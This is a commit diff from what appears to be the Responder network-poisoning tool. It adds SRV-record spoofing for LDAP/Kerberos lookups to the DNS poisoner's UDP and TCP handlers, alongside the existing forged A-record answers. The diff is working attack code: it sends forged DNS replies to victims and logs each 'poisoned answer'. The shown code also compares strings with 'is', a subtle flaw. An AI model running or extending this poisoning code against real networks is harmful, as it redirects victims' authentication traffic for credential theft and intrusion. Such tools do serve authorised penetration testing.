Added DNS SRV handling for ldap/kerberos + LDAP netlogon ping

2025-08-14 02:27:12 -07:00 · 2021-04-12 20:42:36 -03:00 · 2021-04-12 20:42:36 -03:00 · 1271b8e179
commit 1271b8e179
parent d01bbaafae
5 changed files with 313 additions and 17 deletions
--- a/servers/DNS.py
+++ b/servers/DNS.py
@ -15,7 +15,7 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from packets import DNS_Ans
+from packets import DNS_Ans, DNS_SRV_Ans
 if settings.Config.PY2OR3 == "PY3":
 	from socketserver import BaseRequestHandler
 else:
@ -23,9 +23,11 @@ else:

 def ParseDNSType(data):
 	QueryTypeClass = data[len(data)-4:]
-
 	# If Type A, Class IN, then answer.
-	return QueryTypeClass == "\x00\x01\x00\x01"
+	if QueryTypeClass == "\x00\x01\x00\x01":
+		return "A"
+	if QueryTypeClass == "\x00\x21\x00\x01":
+		return "SRV"



@ -37,12 +39,19 @@ class DNS(BaseRequestHandler):

 		try:
 			data, soc = self.request
-			if ParseDNSType(NetworkRecvBufferPython2or3(data)) and settings.Config.AnalyzeMode == False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode == False:
 				buff = DNS_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
+				buff = DNS_SRV_Ans()
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))

 		except Exception:
 			pass
@ -56,12 +65,19 @@ class DNSTCP(BaseRequestHandler):
 	
 		try:
 			data = self.request.recv(1024)
-			if ParseDNSType(NetworkRecvBufferPython2or3(data)) and settings.Config.AnalyzeMode is False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode is False:
 				buff = DNS_Ans()
 				buff.calculate(NetworkRecvBufferPython2or3(data))
 				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print(color("[*] [DNS-TCP] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
+				buff = DNS_SRV_Ans()
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				self.request.send(NetworkSendBufferPython2or3(buff))
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))

 		except Exception:
 			pass